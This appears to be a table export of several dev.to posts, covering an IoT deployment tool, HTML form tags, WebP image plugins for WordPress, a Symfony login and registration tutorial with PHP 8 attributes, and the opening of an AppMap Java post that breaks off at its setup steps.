id | title | description | collection_id | published_timestamp | canonical_url | tag_list | body_markdown | user_username |
|---|---|---|---|---|---|---|---|---|
807,607 | Showdev: deploy apps to edge devices and servers with Synpse | Synpse allows managing IoT device fleets and servers, deploy apps to them with automated updates, SSH access and TCP port forwarding | 0 | 2021-09-02T14:07:39 | https://dev.to/krusenas/showdev-deploy-apps-to-edge-devices-and-servers-with-synpse-43k4 | showdev, productivity, tooling, iot | ---
title: Showdev: deploy apps to edge devices and servers with Synpse
published: true
description: Synpse allows managing IoT device fleets and servers, deploy apps to them with automated updates, SSH access and TCP port forwarding
tags: showdev, productivity, tooling, iot
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tc40v1y4ye2cuqlabfn6.png
---
Hey dev.to! I wanted to share our project [Synpse](https://synpse.net) that my friend and I have been working on for quite some time.
## TL;DR;
> Registration is now open at https://cloud.synpse.net. Free for up to 5 devices forever. We can increase your quotas if requested. Self-hosted version available as well.
Synpse provides tooling and services to:
- Prepare machine images that you can burn into SD cards to quickly bootstrap hundreds or thousands of devices.
- Generate a simple installation script for one-off device/server bootstrap.
- Group devices based on labels (used for both filtering and scheduling applications).
- Automated device naming (based on hostname, random names, etc.).
- Deploy containerized applications (Docker Compose/K8s Pod style).
- Automated device software updates.
- Easily scale to tens or hundreds of thousands of devices.
- SSH into any of your devices through `synpse` CLI or web UI.
- Kubectl style port-forward command to open up TCP tunnels.
- CPU/RAM utilization metrics from devices.
## Problem
While it's easy to configure systemd or some other init service in an OS image to launch your application on device boot, it won't help much with fast updates or gradual rollouts. It also won't help much if, during the rollout, you need to collect some data from applications (logs, SSH access to check some files).
We had a need to deploy a quite complex piece of software to ~1200 devices. After looking into a bunch of alternatives like Mender, Balena and Deviceplane, we came to the conclusion that each of them suffered from at least one of these problems:
- We couldn't use our own image (we had a manufacturer that could only use their own Linux distro; a new custom OS was not an option).
- Self-hosting was too complicated.
- Not scalable (started slowing down considerably with very few devices).
## Solution
Our testing gave us an understanding of what the ideal solution would look like:
- Simple self-hosting: a horizontally scalable controller and a managed database (we chose Postgres), without disrupting your bank balance.
- Support for any Linux OS.
- No attempt to be compatible with either Kubernetes or Docker Compose in the API/config manifests. These systems require different semantics, so it's fine to be similar, but a 1:1 mapping will just damage the UX.
- SSH and application logs are a must when you have an outage and need a fast way to debug.
- Everything belongs to a project. A project can have multiple users, but projects should be able to survive multiple generations of users, as these systems will last longer than many individual employees.
## The feel
The one-off device provisioning script and execution parameters can be found on either the "devices" or "provisioning" pages:

Once devices are added, they appear in your dashboard for SSH access and monitoring:

You can read more about device management here: https://docs.synpse.net/synpse-core/devices.
You can add various labels and then use them in the application deployment:

View application docs here: https://docs.synpse.net/synpse-core/applications.
Most applications have some shared or private configuration. Luckily, Synpse provides secrets (similar to Kubernetes ones) that you can reference from your application spec:

And when things go south, view your application logs on any of the devices:

## Use cases
As mentioned in the first paragraph, we built Synpse for a medium-sized fleet of ~1200 IoT devices and a bunch of large servers, as it turns out the UX can be much nicer than Docker Compose or Kubernetes. All of those devices are actually card readers in a large bus/trolleybus fleet in Lithuania :)
We would recommend using Synpse for:
- Home lab deployments (up to 5 devices free forever).
- PoS deployments.
- Public transport fleets.
- ML on edge (packaging and running ML inference through Docker containers).
- Any kind of industrial applications where devices can be offline for a prolonged time. Synpse will work well without internet access.
- Normal VMs on cloud providers that don't provide good application deployment UX (most smaller ones like Vultr, DO, Packer, etc.)
## Next steps
If you run software yourself or in a company, you should definitely check it out.
Useful links:
- Docs: https://docs.synpse.net/
- Website: https://synpse.net
- Our Discord channel: https://discord.gg/dkgN4vVNdm | krusenas |
807,709 | Leetcode Solutions to Graph Algorithm Problems | Leetcode contains some of the most popular interview questions asked across organizations. This... | 0 | 2021-08-30T07:42:05 | https://dev.to/abhilash1910/leetcode-solutions-to-graph-algorithm-problems-ak0 | algorithms, computerscience | [Leetcode](https://leetcode.com/) contains some of the most popular interview questions asked across organizations. This YouTube playlist contains solutions to some of the most important graph algorithms that are asked in interviews and present on Leetcode:
https://www.youtube.com/watch?v=w9wv2jlF3jY&list=PLovuuDh4TFdCJ00I378H-REodw6AWygN1
Do subscribe if you find it helpful!
| abhilash1910 |
807,727 | 10 HTML Form Tags You Should Know | This article has been originally posted on Getform Blog. HTML tags can be considered as special... | 0 | 2021-08-30T13:47:00 | https://blog.getform.io/10-html-form-tags-you-should-know/ | This article has been originally posted on [Getform Blog](https://blog.getform.io/10-html-form-tags-you-should-know/?utm_source=dev.to&utm_medium=website&utm_campaign=html-form-tags-article).
----
HTML tags can be considered special keywords that help web browsers define how to format and display the content within a website. Since HTML forms are commonly used to collect input from website visitors to receive feedback, support requests, job applications, and more, form-related HTML tags are a lot more interactive than other HTML tags.
In this guide, we will go over all the form-related HTML tags, starting from the most known ones like the `<form>` and `<input>` tags and then continuing with the ones that might be very helpful and interesting to use, such as the `<output>` and `<progress>` tags, for shaping your HTML forms in the best way.
### HTML Form Tag
The `<form>` tag is used for creating an interactive section, a form to gather user inputs within your website. It defines the area that contains all the form elements for data submission.
The most common and important attributes used with the `<form>` tag are "action" and "method". The "action" attribute specifies the URL of the service that will receive and process the data after form submission. The "method" attribute, on the other hand, defines the HTTP method for sending the data, which can be either GET or POST.
Here's how the `<form>` tag is used:
```html
<form action="https://getform.io/f/{unique-form-endpoint-goes-here}"
method="POST">
All the form content goes here..
</form>
```
### Input Tag
The `<input>` tag is the most popular one since it helps you to define different kinds of input fields such as text, email address, phone number, dates, file upload, radio buttons, and more.
In order to specify the kind of input field, the "type" attribute is necessary to use with the `<input>` tag. Another useful attribute is "name", which defines the name under which the input's value is sent to the server. You can also use the "placeholder" attribute to give users a hint about what kind of value is expected in the input field. The "required" attribute is also important for specifying the input fields that must be filled out before submitting the form.
Let's add some use cases of the `<input>` tag for different kinds of input fields into the `<form>` tag:
```html
<label for="name">Full Name*:</label>
<input type="text" id="name" name="name" placeholder="Your Name*"
       required="required">
<label for="email">Email Address*:</label>
<input type="email" id="email" name="email" placeholder="Your Email*"
       required="required">
<label for="phone">Phone Number</label>
<input type="tel" id="phone" name="phone" placeholder="1-(555)-555-5555">
<label for="male">Male</label>
<input type="radio" id="male" name="gender" value="male">
<label for="female">Female</label>
<input type="radio" id="female" name="gender" value="female">
<label for="other">Other</label>
<input type="radio" id="other" name="gender" value="other">
```
### Label Tag
The `<label>` tag is used for creating a caption or label for input elements on your web form. It provides a short description of the input field.
You can use the `<label>` tag by placing the form control inside it or by adding the "for" attribute which is used for specifying the input element that is bound to the label.
We will add the `<label>` tag to the existing input fields and also to the radio buttons that we will be creating by using `<input type="radio">`:
{% codepen https://codepen.io/getform/pen/rNwOGLZ %}
### Select & Option Tags
If you need a drop-down menu with various options in your form, then you can use the `<select>` and the `<option>` tags. The `<select>` tag is used for defining the selection or drop-down list itself. All the options in the list are represented by the `<option>` tag.
Regarding the attributes, you can use the "name" attribute with the `<select>` tag as well. To define a value for each option in the drop-down list, you should add the "value" attribute to the `<option>` tag.
Here's an example of how it looks:
{% codepen https://codepen.io/getform/pen/YzQyrKm %}
### Textarea Tag
The `<textarea>` tag is used for creating multi-line text areas that can have an unlimited number of characters. It is a very useful tag for having a form field to gather visitors' comments or messages.
If you want to specify the size of the text area, you can add "rows" and "cols" attributes. The "name" attribute is also used here to define the name that is sent by the browser. Another one is the "maxlength" attribute which allows you to limit the number of characters that can be entered in the text area.
Here's an example:
{% codepen https://codepen.io/getform/pen/OJgyxmW %}
### Optgroup Tag
As one of the lesser-known form-related HTML tags, the `<optgroup>` tag can be very useful if you want your visitors to choose an option from a long drop-down list more easily. You can group related `<option>` elements within the `<select>` list by using the `<optgroup>` tag. You can add the "label" attribute to define a common name for each group of options.
Let's use the `<optgroup>` tag for the drop-down list that we created earlier:
{% codepen https://codepen.io/getform/pen/gORaGmw %}
### Progress Tag
As one of the tags introduced with HTML5, the `<progress>` tag is used for creating a progress bar to display the progress of tasks like uploads or downloads. The most common use case of the tag in web forms is to represent the progress of a file uploading.
To determine the progress value, you can use "value", "min" and "max" attributes with the `<progress>` tag.
Let's create a progress bar for file uploading, which will be displayed alongside an `<input type="file">`:
{% codepen https://codepen.io/getform/pen/wveMWjE %}
### Fieldset & Legend Tags
You can think of the `<fieldset>` tag as a container for the related form elements. It is helpful to make your form more understandable for users. The `<legend>` tag is there to add a title for the box that is created by the `<fieldset>` tag.
Let's use these tags to group some of the form elements mentioned earlier:
{% codepen https://codepen.io/getform/pen/yLXeJwB %}
### Output Tag
As a newly introduced and lesser-known tag compared to others, the `<output>` tag is used for displaying a result of a calculation or a user action performed usually by a script.
You can use the "name" attribute to indicate a name for the `<output>` tag. To define a unique id for any element in an HTML document, you should use the "id" attribute, which allocates a unique identifier used by CSS or JavaScript to perform certain tasks. Another attribute that can be used with the `<output>` tag is the "for" attribute. It specifies the relationship between the result and the elements that are used in the calculation by listing their "id" attributes.
Let's demonstrate one of the `<output>` tag's use cases, built with the help of `<input type="range">`:
{% codepen https://codepen.io/getform/pen/rNwxLKa %}
### Button Tag
As its name signifies, the `<button>` tag is used for creating clickable buttons within your HTML form. You can also create buttons by using `<input type="button">`, but you cannot add text inside the button without the "value" attribute. You should add the "type" attribute to define the type of the button.
Here's how it is used:
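As a minimal sketch (the endpoint URL and label text here are just placeholder examples), a `<button>` inside a form might look like this:

```html
<form action="/submit" method="POST">
  <!-- type="submit" sends the form data to the "action" URL -->
  <button type="submit">Send Message</button>
  <!-- type="reset" clears all the fields in the form -->
  <button type="reset">Clear</button>
</form>
```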
That's it!
Lastly, let's create a complete Job Application form with the form related HTML tags that we covered earlier.
This example form contains the `<form>` tag with the enctype="multipart/form-data" attribute to allow file uploads; the `<fieldset>`, `<legend>`, `<label>`, `<select>`, `<option>`, `<optgroup>`, `<textarea>`, `<progress>` and `<input>` tags; and finally the `<button>` tag to submit the data.
To submit the data, we will take a unique form endpoint generated on Getform and place it in the "action" attribute. Once submitted, here's how it will look on the Getform dashboard.

### Conclusion
We hope you will find this guide useful for discovering major form-related HTML tags. If you liked this post, don't forget to share and follow us on [LinkedIn](https://www.linkedin.com/company/getform/) and [Twitter](https://twitter.com/getformio) for more updates from Getform blog!
If you would like help setting up Getform on your HTML forms, feel free to reach out to us at <info@getform.io>
* * * * *
You can find more information and code samples for different use cases from the resources below.
- [Codepen examples](https://codepen.io/getform)
- [Codesandbox examples](https://codesandbox.io/u/omerozturkh/sandboxes)
- [Getform Documentation](https://docs.getform.io?utm_source=dev.to&utm_medium=website&utm_campaign=html-form-tags-article)
| mertcanyucel | |
807,753 | How to Serve images in next Gen Formats? | Google do recommend converting images from png, jpeg to webp formats that’s why serve images in next... | 0 | 2021-08-30T10:16:19 | https://dev.to/wpsyed/how-to-serve-images-into-next-gen-formats-p9f | programming, wordpress, webdev, devops | Google does recommend converting images from PNG and JPEG to the WebP format; that's why the "serve images in next-gen formats" suggestion comes up in Google PageSpeed Insights. If you don't know how to fix this issue on your WordPress website, then stay here. I will go over a little bit about serving images in next-gen formats.
## Table Of Contents
* What is WebP
* Use a WebP plugin
* Convert images to WebP by using free tools
* ShortPixel
* Imagify
* Optimole
# What is WebP
WebP is the latest-generation format for images like PNG and JPEG. Google prefers the smaller image files that you should use on your web pages. To serve your images in WebP format, you simply need to use the free tools that we are going to cover later.
WebP images are 26% smaller in size compared to JPEG and PNG files. On the other hand, you can serve your high-quality images in WebP format without losing quality. This will result in both faster speeds and better PSI reports.
*Average WebP file size compared to JPEG and PNG (image source).*
Here is an example of both the WebP and JPEG versions of an image: you can see there is no visible difference at all, yet the WebP file is almost 10% smaller than the JPEG.
# Use a WebP plugin
Using a third-party WebP plugin will save you some time and improve page load time by making a copy of your original images with a smaller file size.
If you are getting this warning in the Google PageSpeed Insights report:
"Serve images in next-gen formats"
then you simply need to use some of the free WordPress tools that I have listed down below.
1. ShortPixel (free/paid)
2. Imagify (free/paid)
3. Optimole (free)
4. EWWW Image Optimizer (free/paid)
5. WP Smush (free/paid)
The one I recommend for you is WebP Converter for Media. This plugin is super fast, lightweight, and less bloated than the others. The developer is well skilled and coded the plugin his own way.
Believe me, after activating this plugin the issue was completely resolved in Google PageSpeed Insights. I will show you how you can do the same.
Go over to the WordPress dashboard and add the new plugin.
*WebP Converter for Media optimizes your images.*
After installing and activating the plugin, you have to go to its settings. If your server/web host allows .htaccess files, then it's fine; if it does not, then you have to select the second option to continue the conversion process.
# WebP Converter for Media plugin settings
The .htaccess method is recommended by default in this plugin, though. After that, go to the bottom of the settings page and click on "force regenerate all images".
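Under the hood, the .htaccess approach boils down to a set of rewrite rules. A rough, hypothetical sketch of what such rules look like (the exact directory and file layout depend on the plugin version and your setup):

```apache
<IfModule mod_rewrite.c>
  RewriteEngine On
  # Only rewrite when the browser says it accepts WebP...
  RewriteCond %{HTTP_ACCEPT} image/webp
  # ...and a converted copy of the image actually exists
  RewriteCond %{DOCUMENT_ROOT}/wp-content/uploads-webpc/$1.$2.webp -f
  # Serve the .webp copy instead of the original JPEG/PNG
  RewriteRule ^/?(.+)\.(jpe?g|png)$ /wp-content/uploads-webpc/$1.$2.webp [T=image/webp,L]
</IfModule>
```

This way, browsers without WebP support keep receiving the original files, while everyone else gets the smaller copies automatically.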
You can also select the quality of your images, but I prefer selecting 85% because it is perfect for high-quality images, so you will never lose the quality of your images.
*Force-convert all images from JPEG to WebP.*
This plugin will create copies of your original images and serve them in next-gen formats. Now let me show you how I solved this issue quickly in Google PageSpeed Insights.
To convert your images from JPEG to WebP files, install WebP Converter for Media.
*Serve images in next-gen formats.*
# Convert Images To WebP Using Free Online Tools
If you hate installing third-party plugins, then there are some free tools that you can use to serve your images in next-gen formats. One of my favourites is CloudConvert's WebP Converter, also a popular choice.
*Convert images to next-gen formats with CloudConvert's WebP converter.*
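Keep in mind that a manually converted file is not served automatically: you have to reference it yourself. A minimal sketch using the standard `<picture>` element (the file names are just placeholders):

```html
<picture>
  <!-- Browsers that understand WebP will pick this source -->
  <source srcset="photo.webp" type="image/webp">
  <!-- Older browsers fall back to the JPEG version -->
  <img src="photo.jpg" alt="Example photo">
</picture>
```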
[for more pc speed up guides](https://techchatter.net/)
# Shortpixel
ShortPixel is a great plugin and it has more than 300,000+ active installations. The plugin allows you to optimize your images and helps you make your website faster by lazy loading your images.
You can check this option if you want ShortPixel to serve your images in next-gen formats.
# Imagify
Imagify is again among the best plugins, but it is limited. If you have tons of images on your website, then you have to buy extra credits from Imagify. Otherwise, I recommend you stick with WebP Converter for Media.
Imagify has more than 500,000+ active installations in WordPress.
*Imagify: an image optimization plugin for WordPress.*
# Optimole
You can replace any image optimization plugin with Optimole. After installing Optimole, you have to get an API key to activate it. After that, all your images will be compressed and converted to WebP, or served scaled from the CloudFront CDN.
Overall, this plugin has a 5-star rating, so you can read more reviews. I won't comment much on this plugin because I haven't personally used it for long.
# Conclusion
All right, wrapping up: this tutorial was all about image optimization and serving images in next-gen formats, which can clearly improve your web page load time if you follow this guide step by step. And Google does like fast websites. If you have any questions related to speed, security, and performance, then please let me know in the comment box. I will be happy to hear from you. | wpsyed |
807,771 | React if you use replit | If you use repl.it kindly react with the heart or unicorn. If you don't then react with a comment... | 0 | 2021-08-30T10:52:18 | https://dev.to/codeboi/react-if-you-use-repl-it-2k1e | poll, debate, codequality, replit | If you use [repl.it](https://replit.com/), kindly react with the heart or unicorn. If you don't, then react with a comment saying no and explain why you don't. Or suggestions for other code editors would be nice. | codeboi |
807,787 | Implement traditional auth system in Symfony with less code than ever | PHP 8 introduced some new concepts and really helpful syntax features. To significantly reduce the... | 0 | 2021-09-06T10:16:16 | https://dev.to/bornfightcompany/implement-traditional-auth-system-in-symfony-with-less-code-than-ever-5h25 | engineeringmonday, symfony, php, doctrine | PHP 8 introduced some new concepts and really helpful syntax features.
To significantly reduce the boilerplate code, whenever possible, we can use [Constructor property promotion](https://stitcher.io/blog/constructor-promotion-in-php-8). Another thing I'll focus on in this guide is replacing annotations with [PHP attributes](https://stitcher.io/blog/attributes-in-php-8). This will also reduce the number of lines of code in our classes every now and then.
As of version [2.9](https://www.doctrine-project.org/2021/05/24/orm2.9.html), Doctrine supports using PHP 8 Attributes as a new driver for mapping entities.
Not only will we need fewer lines of code than ever for this project, but also we will need to write less of that code ourselves than ever. I’m emphasizing this because we’ll heavily rely on the [Maker bundle](https://symfony.com/bundles/SymfonyMakerBundle/current/index.html) which will generate the majority of files and actual app logic for the project.
At the time of writing this post, Maker bundle still didn’t fully adopt all new PHP possibilities and some adjustments will be done manually.
The goal of the app is to provide a basic traditional authentication system with registration and login features and email verification.
The app will have 3 sections: a *public* section accessible by everyone, a *profile* section available to all logged-in users, and a *content* section available only to verified users.
Account verification will be done by simply clicking a link in the verification email.
Create a new project:
```console
composer create-project symfony/website-skeleton my_new_app
```
(or use Symfony CLI). I’m using Symfony 5.3.7.
Make sure to update required PHP version in `composer.json`:
```diff
{
"require": {
- "php": ">=7.2.5",
+ "php": "^8.0",
}
}
```
Update Doctrine configuration - use attributes instead of annotations! Without this, generation migrations will not work.
`config/packages/doctrine.yaml`
```diff
doctrine:
orm:
mappings:
App:
- type: annotation
+ type: attribute
```
Now let's make initial `User` entity:
```console
php bin/console make:user
```
Answer `[yes]` or select defaults for all questions in the wizard.
This should create `src/Entity/User.php` and `src/Repository/UserRepository.php` and update `config/packages/security.yaml` files.
Symfony Maker bundle still doesn’t support attributes, but generated entities will still save us a lot of time. We can replace annotations with attributes ourselves.
Use attributes and property types to reduce the amount of code.
`src/Entity/User.php`
```diff
- /**
- * @ORM\Entity(repositoryClass=UserRepository::class)
- */
+ #[ORM\Entity(repositoryClass: UserRepository::class)]
class User implements UserInterface, PasswordAuthenticatedUserInterface
{
- /**
- * @ORM\Id
- * @ORM\GeneratedValue
- * @ORM\Column(type="integer")
- */
- private $id;
+ #[ORM\Id, ORM\GeneratedValue, ORM\Column]
+ private int $id;
- /**
- * @ORM\Column(type="string", length=180, unique=true)
- */
- private $email;
+ #[ORM\Column(length: 180, unique: true)]
+ private string $email;
- /**
- * @ORM\Column(type="json")
- */
+ #[ORM\Column(type: 'json')]
private $roles = [];
- /**
- * @var string The hashed password
- * @ORM\Column(type="string")
- */
- private $password;
+ #[ORM\Column]
+ private string $password;
}
```
Make migration and execute it.
```console
php bin/console make:migration
php bin/console doctrine:migration:migrate
```
Generate simple controllers: `PublicController`, `ProfileController`, `ContentController`. This will add routes `/public`, `/profile` and `/content`. You can do this with Maker as well:
```console
php bin/console make:controller
```
Rename the route names for consistency by prefixing them with `app_`.
All 3 routes should be available to anyone at this stage.
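For reference, each generated controller is only a few lines. A sketch of what `ProfileController` might look like after the rename (the template name is whatever Maker generated for you):

```php
<?php

namespace App\Controller;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;

class ProfileController extends AbstractController
{
    // PHP 8 attribute route with the app_ name prefix
    #[Route('/profile', name: 'app_profile')]
    public function index(): Response
    {
        return $this->render('profile/index.html.twig');
    }
}
```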
Add role hierarchy and access rules to `config/packages/security.yaml` to achieve what's explained above:
```diff
security:
+ role_hierarchy:
+ ROLE_VERIFIED_USER: [ ROLE_USER ]
access_control:
+ - { path: ^/content, roles: ROLE_VERIFIED_USER }
+ - { path: ^/profile, roles: ROLE_USER }
```
Now you should be getting *401 Unauthorized* error if you try to access `/profile` or `/content`.
Make the login authentication:
```console
php bin/console make:auth
```
Select `[1] Login form authenticator`, call it `LoginFormAuthenticator`, confirm the controller name: `SecurityController` and accept adding the logout route.
This will update the `config/packages/security.yaml` file by adding a logout route and create authenticator, controller and login form files.
First of all, in the login form Twig template, replace the deprecated `user.username` with `user.userIdentifier`.
```diff
- You are logged in as {{ app.user.username }}, <a href="{{ path('app_logout') }}">Logout</a>
+ You are logged in as {{ app.user.userIdentifier }}, <a href="{{ path('app_logout') }}">Logout</a>
```
In `src/Controller/SecurityController.php` we can replace routes defined by annotations with those defined by attributes.
```diff
class SecurityController extends AbstractController
{
- /**
- * @Route("/login", name="app_login")
- */
+ #[Route('/login', name: 'app_login')]
public function login(AuthenticationUtils $authenticationUtils): Response
- /**
- * @Route("/logout", name="app_logout")
- */
+ #[Route('/logout', name: 'app_logout')]
public function logout()
}
```
Thanks to constructor property promotion in PHP 8, we can rewrite the constructor in `src/Security/LoginFormAuthenticator.php`. While at it, add a proper response in the `onAuthenticationSuccess` method: after a successful login, redirect to the `app_profile` route.
```diff
class LoginFormAuthenticator extends AbstractLoginFormAuthenticator
{
- private UrlGeneratorInterface $urlGenerator;
-
- public function __construct(UrlGeneratorInterface $urlGenerator)
- {
- $this->urlGenerator = $urlGenerator;
- }
+ public function __construct(private UrlGeneratorInterface $urlGenerator)
+ {
+ }
public function onAuthenticationSuccess(Request $request, TokenInterface $token, string $firewallName): ?Response
{
- throw new \Exception('TODO: provide a valid redirect inside '.__FILE__);
+ return new RedirectResponse($this->urlGenerator->generate('app_profile'));
}
}
```
Note: If you're using a Symfony plugin in your code editor and it's complaining it can't find the route with the given name, make sure you've prefixed those routes in controllers as suggested above.
Notice how slim this authenticator became in comparison to what it used to look in older versions of Symfony.
Let’s implement registration logic.
Should we write all of this ourselves? Nope. Maker bundle to the rescue again.
First of all, let’s require another bundle, one for handling email verification logic:
```console
composer require symfonycasts/verify-email-bundle
```
After that, use:
```console
php bin/console make:registration-form
```
Select defaults except the one for including user ID in the link - answer `yes` on that prompt; and select `app_profile` as a route to redirect to after registration.
It's possible that Maker will warn you no Guard authenticators were found and users won't be automatically authenticated after registering. Ignore this for now, we'll implement a solution for this at the end.
The command will change `User` entity and create confirmation email and registration form Twig templates as well as create a `RegistrationController`, `RegistrationFormType` and `EmailVerifier` helper.
Update `src/Entity/User.php` first:
```diff
- /**
- * @UniqueEntity(fields={"email"}, message="There is already an account with this email")
- */
+ #[UniqueEntity(fields: ['email'], message: 'There is already an account with this email')]
class User implements UserInterface, PasswordAuthenticatedUserInterface
{
- /**
- * @ORM\Column(type="boolean")
- */
- private $isVerified = false;
+ #[ORM\Column(options: ['default' => false])]
+ private bool $isVerified = false;
}
```
Generate a migration for adding this new flag and execute it.
```console
php bin/console make:migration
php bin/console doctrine:migration:migrate
```
Symfony recommends putting as little logic as possible in controllers. That’s why complex forms will be moved to dedicated classes instead of defining them in controller actions. Maker did that for us.
There are a few things to change in `RegistrationController` - use constructor property promotion and replace the deprecated `UserPasswordEncoderInterface` with `UserPasswordHasherInterface`.
At the end of the verification process, redirect to the content page.
```diff
+ use Symfony\Component\PasswordHasher\Hasher\UserPasswordHasherInterface;
- use Symfony\Component\Security\Core\Encoder\UserPasswordEncoderInterface;
class RegistrationController extends AbstractController
{
- private $emailVerifier;
-
- public function __construct(EmailVerifier $emailVerifier)
- {
- $this->emailVerifier = $emailVerifier;
- }
+ public function __construct(private EmailVerifier $emailVerifier)
+ {
+ }
- public function register(Request $request, UserPasswordEncoderInterface $passwordEncoder): Response
+ public function register(Request $request, UserPasswordHasherInterface $passwordHasher): Response
{
$user->setPassword(
- $passwordEncoder->encodePassword(
- $user,
- $form->get('plainPassword')->getData()
- )
+ $passwordHasher->hashPassword($user, $form->get('plainPassword')->getData())
);
}
public function verifyUserEmail(Request $request, UserRepository $userRepository): Response
{
- return $this->redirectToRoute('app_register');
+ return $this->redirectToRoute('app_content');
}
}
```
We want to shorten that constructor in the EmailVerifier class and also add proper user roles after email verification:
```diff
class EmailVerifier
{
- private $verifyEmailHelper;
- private $mailer;
- private $entityManager;
-
- public function __construct(VerifyEmailHelperInterface $helper, MailerInterface $mailer, EntityManagerInterface $manager)
- {
- $this->verifyEmailHelper = $helper;
- $this->mailer = $mailer;
- $this->entityManager = $manager;
- }
+ public function __construct(
+ private VerifyEmailHelperInterface $verifyEmailHelper,
+ private MailerInterface $mailer,
+ private EntityManagerInterface $entityManager
+ ) {
+ }
public function handleEmailConfirmation(Request $request, UserInterface $user): void
{
$user->setIsVerified(true);
+ $user->setRoles(['ROLE_VERIFIED_USER']);
}
}
```
In later versions of the Maker bundle, where the dependency on Guards will be dropped, this might be resolved, but for now we have to implement logging the user in after registration manually.
Not a huge deal really. Just inject the `UserAuthenticatorInterface` and our authenticator in the `register` method and authenticate the user before returning the redirect response.
```diff
+ use App\Security\LoginFormAuthenticator;
+ use Symfony\Component\Security\Http\Authentication\UserAuthenticatorInterface;
class RegistrationController extends AbstractController
{
- public function register(Request $request, UserPasswordHasherInterface $passwordHasher): Response
- {
+ public function register(
+ Request $request,
+ UserPasswordHasherInterface $passwordHasher,
+ UserAuthenticatorInterface $authenticator,
+ LoginFormAuthenticator $formAuthenticator
+ ): Response {
if ($form->isSubmitted() && $form->isValid()) {
// ...
+ $authenticator->authenticateUser($user, $formAuthenticator, $request);
return $this->redirectToRoute('app_profile');
}
}
```
That's basically it for the scope of this guide 🤓
Try accessing the `/profile` or `/content` route. You should be redirected to the login page. If you haven't registered yet, it's time to register as a new user.
Go to `/register` and enter the desired email and password. You should be logged in automatically and redirected to `/profile`. Accessing `/content` is still not possible.
You should have received a verification email. For this to work out of the box, you only need to set up the `MAILER_DSN` environment variable according to your mail server.
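For illustration, a `MAILER_DSN` entry in `.env` looks something like this (the host and credentials below are placeholders, not real values):

```env
# .env (hypothetical examples; substitute your own transport)
MAILER_DSN=smtp://user:pass@smtp.example.com:587
# or, during local development, silently discard all mail:
MAILER_DSN=null://null
```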
After clicking the confirmation link, the `is_verified` flag will be set, the `ROLE_VERIFIED_USER` role will be added, and you'll be able to access `/content`.
As a next step, you can render flash messages, add a password reset feature (by including another great bundle: `symfonycasts/reset-password-bundle`), or maybe implement social logins.
Let me know in the comments if code snippets with diffs weren't clear enough or if you have any other questions. | gh0c |
807,964 | A career in IT | This post is a list of comments I made in the t.me/SegInfoBRasil group about how to take the first steps... | 0 | 2021-08-30T12:00:52 | https://dev.to/vitormattos/carreira-na-area-de-ti-4n7l | career, opensource, beginners | 
This post is a list of comments I made in the t.me/SegInfoBRasil group about how to take the first steps in a career in technology:
Join communities, and not just as a consumer: participate actively. There are several ways to do this:
* Help with administration by nudging the admins whenever you see any strange behavior in the group
* Help by updating a page on the community's website. Send PRs with updates, open issues to interact with the current maintainers, and resolve the issues you open. Just from that you will learn a ton: git, basic Linux commands, markdown, etc. Not to mention you will be building a résumé, and a public one at that.
* Help with organizing online events, promoting events, and managing social media. None of this requires technical knowledge, it helps the community a lot, and it always brings positive consequences back to whoever does it.
* Join communities related to the field you want to work in, find out about their events, and attend them.
* Follow professionals in the field on social media, GitLab, and GitHub, and see what people have been doing.
* Get a degree in a technology field. Academic education can sound a bit tedious, but it is essential for learning how to put all this knowledge, in an organized way, into its proper boxes, and for understanding the whole lifecycle of something in IT: from the initial client meeting through analysis, development, implementation, delivery, and maintenance.
* Take online courses. If possible, check with the community to find out whether a course is any good. There is a lot of material on the internet that is complete garbage. These days there are YouTube video lessons on everything you can imagine, all for free, so paying for a course is, in most cases, just paying for material that is already free on YouTube and across the internet.
* Just to reinforce: don't use the community as a place to consume knowledge; contribute, interact, and actively help the community grow.
* Contribute translations to various projects. There are plenty of manuals to be translated in this world. PHP is the most used web language in the world today, powering roughly 80% of the sites we access, yet only about 10% of the PHP manual has been translated into Portuguese, and much of that 10% is outdated. By doing this you will learn English, help the community enormously, and learn lots of interesting things.
* Write tutorials on dev.to about everything you do.
- Oh, it's a silly little thing, I just learned how to use the grep command on Linux.
Even that silly little thing is enough material for a talk to take to events.
Document everything, everything! Going to install a Linux distro? Write a tutorial. Learned a new command? Write a tutorial. Make tutorials about everything!
There are already tons of them on the internet, but this will help you exercise your reasoning. When we set out to teach something to someone, the knowledge consolidates in our minds far more strongly.
* Use GNU Linux!!!!!!!
* Use free software; cut proprietary software out of your life. FLOSS is life. And, back on topic: participate in the communities of the software you use.
* RTFM
* It's also a good idea to record video tutorials. If you don't want to show your face, wear an Anonymous mask (kidding); if you don't want to appear, just leave the audio and the shared screen. A 5-minute video tutorial with a how-to presenting a system, a command, or something cool you discovered will enrich your text tutorial on dev.to a lot more.
* Find a project you like and follow its development: look at the issues, make an effort to interact, look for a beginner-friendly issue, and contribute code to the project as well.
That's it, folks! | vitormattos
807,980 | See how Java frameworks like Spring work with your code | Spring + Your Code = ❤️ Most of the time! The one criticism that sticks to the Spring framework (and... | 0 | 2021-08-30T13:01:29 | https://dev.to/appmap/see-how-java-frameworks-like-spring-work-with-your-code-1acl | java, debugging, webdev | Spring + Your Code = ❤️ Most of the time!
The one criticism that sticks to the Spring framework (and other big web frameworks, to be honest) is that Spring does so much for you that it can be hard to understand what's really going on. Sometimes we can just follow the docs and tutorials and watch the magic happen. But sometimes we really need to understand how Spring, and related packages, actually work. And even more importantly, how they work with **our code**.
You're already familiar with using debuggers - and Java has an excellent debugger compared to some other languages. When you use a debugger, you take an "inside-out" approach to troubleshooting. You choose a point in your code where you want to start, and then you can explore outwards from
there. But while you can get a lot of detailed information that way, it's hard to build an understanding of what's going on overall in the codebase.
To build that kind of high-level understanding, you need more of an "outside-in" approach. Here's a cookbook you can follow to see how your code works with Spring and other Java libraries, starting from the widest scope and narrowing in on details. To do that, I will show you how to use an open
source tool called [AppMap](https://appland.com/products/appmap). AppMap records the runtime behavior of your code and stores it as JSON files called AppMaps. Then you can open AppMaps files in your code editor ([VSCode](https://marketplace.visualstudio.com/items?itemName=appland.appmap) or [IntelliJ](https://plugins.jetbrains.com/plugin/16701-appmap)) and view and search dependency maps and execution trace diagrams.
Here's how you use it:
### 1. Install the appmap-java agent
Follow the [quick start guide for VSCode or IntelliJ](https://appland.com/docs/quickstart/).
Here's a quick checklist:
- Add the appmap Java agent to your Maven or Gradle configuration - or just download the JAR file from [https://github.com/applandinc/appmap-java/releases](https://github.com/applandinc/appmap-java/releases)
